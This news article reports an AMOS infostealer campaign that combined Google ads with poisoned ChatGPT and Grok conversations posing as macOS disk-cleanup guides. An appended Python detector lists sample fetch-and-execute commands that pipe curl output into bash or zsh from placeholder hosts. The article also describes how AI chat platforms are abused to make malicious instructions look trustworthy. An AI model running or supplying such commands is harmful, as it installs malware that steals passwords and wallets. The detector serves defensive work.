- AMOS operators used malvertising and poisoned ChatGPT/Grok conversations to push Mac malware
- Fake “free disk space” guides tricked users into running Terminal commands that installed AMOS
- The campaign abused Google ads and trusted AI platforms, increasing the credibility and success of the infection
AtomicOS (AMOS) criminals are using a combination of malvertising and GenAI response poisoning to trick macOS users into downloading malware. This is according to cybersecurity researchers at Huntress, who claim to have not only observed the attacks in the wild, but also reproduced the same results the victims saw.
In a blog post published earlier this week, Huntress said that AMOS maintainers first created two AI conversations: one with ChatGPT and one with Grok.
These conversations were about how to free up disk space on a macOS device and included instructions on how to do so. However, the instructions are fake and instead tell the user to open the Terminal app and type a command that downloads and executes the AMOS infostealer.
A twist on ClickFix
From there, they purchased ad space on Google to promote these conversations. That way, when a user searches for something like “how to free up disk space on MacOS,” these poisoned threads will show up at the top of the search engine results page.
Apparently the trick worked, because Huntress was brought in to investigate a case of AMOS infections. For those who don’t know, AMOS is an infamous macOS information stealer, capable of stealing sensitive data, passwords, cryptocurrency wallet information, and more.
The scam works similarly to ClickFix, another technique that tricks victims into executing Terminal commands. The only difference is that in this case the victims are actually proactively seeking a solution to a real problem, rather than a non-existent one. What makes this campaign more dangerous is that it abuses not one, but three trusted services: the Google search engine, ChatGPT, and Grok Answers.
At the end of the day, both conversations are hosted on their respective platforms, increasing the perceived legitimacy of both instructions. However, it is unclear how the AMOS operators got ChatGPT and Grok to display these results.
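The fake guides described above end in a Terminal command that downloads and executes a payload. As an added example (not code from Huntress or the original article), the Python below flags that command shape in shell history or process-execution telemetry. The rule names, patterns and sample commands are constructed assumptions, since the article does not reproduce the actual command.

```python
import re

# Heuristics for "download and execute" one-liners. These are generic
# patterns, not the campaign's actual command (the article does not show it).
FETCH = r"\b(?:curl|wget)\b"
SHELL = r"(?:/\S*/)?(?:sh|bash|zsh|osascript|python3?)\b"
RULES = {
    "fetch_piped_to_interpreter": re.compile(FETCH + r"[^|;&]*\|\s*(?:sudo\s+)?" + SHELL),
    "interpreter_runs_fetched_text": re.compile(SHELL + r"\s+-c\s+[\"']?\$\(\s*" + FETCH),
    "base64_decoded_into_interpreter": re.compile(
        r"\bbase64\s+(?:-d|-D|--decode)\b[^|;&]*\|\s*(?:sudo\s+)?" + SHELL),
    "fetch_then_chmod_exec": re.compile(FETCH + r".*(?:&&|;)\s*chmod\s+\+x\b"),
}

def classify(command):
    """Return the sorted names of every rule the command line matches."""
    return sorted(name for name, rx in RULES.items() if rx.search(command))

def triage(commands):
    """Map each flagged command to its matched rules; clean ones are omitted."""
    flagged = {}
    for cmd in commands:
        hits = classify(cmd)
        if hits:
            flagged[cmd] = hits
    return flagged

# Constructed sample input: commands as they might appear in shell history
# or endpoint telemetry. Hosts use the reserved .invalid TLD.
SAMPLES = [
    "du -sh ~/Library/Caches/*",
    "curl -fsSL https://cdn.example.invalid/clean.sh | bash",
    '/bin/bash -c "$(curl -fsSL https://example.invalid/install.sh)"',
    "echo Y3VybCAuLi4= | base64 -D | zsh",
    "curl -o /tmp/update https://example.invalid/u && chmod +x /tmp/update && /tmp/update",
    "curl -O https://example.invalid/report.pdf",
]

if __name__ == "__main__":
    for cmd, hits in triage(SAMPLES).items():
        print(f"{', '.join(hits):35} {cmd}")
```

A match is a lead for review rather than a verdict, because some legitimate installers are distributed as the same kind of one-liner.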
Via AppleInsider




